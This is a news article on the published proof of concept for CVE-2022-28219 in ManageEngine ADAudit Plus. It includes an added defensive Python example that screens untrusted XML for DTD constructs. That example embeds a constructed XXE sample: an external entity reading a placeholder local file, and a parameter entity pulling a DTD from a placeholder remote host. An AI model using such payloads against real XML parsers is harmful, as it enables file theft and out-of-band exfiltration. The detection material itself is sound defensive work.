4 July 2022

Security researcher published PoC exploit for Zoho ManageEngine ADAudit Plus bug


Security researcher Naveen Sunkavally from Horizon3.ai uncovered technical details and published a proof-of-concept exploit code for a high severity vulnerability (CVE-2022-28219) in Zoho ManageEngine ADAudit Plus, a compliance tool used by enterprises to monitor changes to Active Directory.

By exploiting this vulnerability, an attacker can gain remote access to sensitive information. The flaw exists because the application does not sufficiently validate user-supplied XML input: a remote attacker can submit specially crafted XML to the affected application and either read the contents of arbitrary files on the system or make the server initiate requests to external systems.

According to Sunkavally, his starting point was an endpoint served by the CewolfRenderer servlet from the third-party Cewolf charting library. This caught his attention and prompted him to dig deeper.

It turned out to be the same vulnerable endpoint involved in CVE-2020-10189, which researcher Steven Seeley had reported against ManageEngine Desktop Central. As Sunkavally notes, the FileStorage class in this library had been abused there for remote code execution via untrusted Java deserialization.

Having established how code could be executed remotely, the researcher next looked for a way to upload files without authentication. Sunkavally discovered that some ADAudit Plus endpoints, used by agents running on monitored machines to upload security events, did not require authentication. He then managed to trigger a blind XXE vulnerability in the ProcessTrackingListener class, which handles events that carry Windows scheduled task XML content.
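As an added example (not code from the article, from Horizon3.ai or from Zoho's product), the following Python shows the defensive check a service ingesting agent-supplied XML would want in front of its parser: it flags DOCTYPE declarations and external or parameter entities, the constructs that both the file-read and the blind, out-of-band variants of XXE depend on, and it parses only DTD-free documents whose root is the expected scheduled-task element. The two sample documents, the placeholder URIs inside them and the `Task` root check are constructed for this example and are not taken from the disclosed exploit.

```python
"""Pre-screen untrusted XML for DTD constructs before parsing it.

Added example, not part of the original article. The sample documents and
placeholder URIs below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a DTD-free scheduled-task document of the kind an agent
# would upload. The namespace is the Windows Task Scheduler schema.
BENIGN_TASK = """<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>EXAMPLE\\admin</Author></RegistrationInfo>
  <Actions Context="Author">
    <Exec><Command>C:\\Windows\\System32\\notepad.exe</Command></Exec>
  </Actions>
</Task>
"""

# Constructed sample of the shape a detector must catch: an internal DTD that
# declares an external general entity (file read) and an external parameter
# entity (the out-of-band pattern behind blind XXE). URIs are placeholders.
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE Task [
  <!ENTITY ext SYSTEM "file:///PLACEHOLDER/local/file">
  <!ENTITY % remote SYSTEM "http://dtd.invalid/PLACEHOLDER.dtd">
  %remote;
]>
<Task><Actions><Exec><Command>&ext;</Command></Exec></Actions></Task>
"""

# A well-formed document has at most one DOCTYPE and it precedes the root
# element, so a plain text scan is cheap. Matching is deliberately
# conservative: a hit inside a comment or CDATA section only causes an
# unusual document to be rejected, never a payload to be accepted.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b")
ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(SYSTEM|PUBLIC)\b")


def inspect_xml(doc: str) -> list:
    """Return findings describing DTD constructs present in `doc`.

    An empty list means the document declares no DTD at all.
    """
    findings = []
    if DOCTYPE_RE.search(doc):
        findings.append("doctype")
    for match in ENTITY_RE.finditer(doc):
        kind = "parameter-entity" if match.group(1) else "external-entity"
        findings.append(f"{kind}:{match.group(2)}")
    return findings


def local_name(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def parse_untrusted(doc: str, expected_root: str = "Task") -> ET.Element:
    """Parse `doc` only if it carries no DTD and has the expected root element.

    Rejecting any DOCTYPE up front also removes entity-expansion (billion
    laughs) risk, since without a DTD there are no custom entities to expand.
    """
    findings = inspect_xml(doc)
    if findings:
        raise ValueError("rejected XML with DTD constructs: " + ", ".join(findings))
    root = ET.fromstring(doc)
    if local_name(root.tag) != expected_root:
        raise ValueError(f"unexpected root element {root.tag!r}")
    return root


def accepts(doc: str, expected_root: str = "Task") -> bool:
    """True if `doc` passes the pre-screen and parses as the expected schema."""
    try:
        parse_untrusted(doc, expected_root)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_TASK), ("xxe", XXE_SAMPLE)):
        print(label, "accepted" if accepts(sample) else "rejected", inspect_xml(sample))
```

The text scan is a belt-and-braces layer for logging and alerting; the parser itself must still be configured to refuse DTDs. In a Java service like the one described here that means setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the `DocumentBuilderFactory` or `SAXParserFactory`, and in Python it means never enabling external general entities on `xml.sax` parsers, which leave them disabled by default in current releases.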

A malicious actor can attack the affected ADAudit Plus instance, obtain Active Directory credentials, and use that access to spread malware to every system connected to the network.
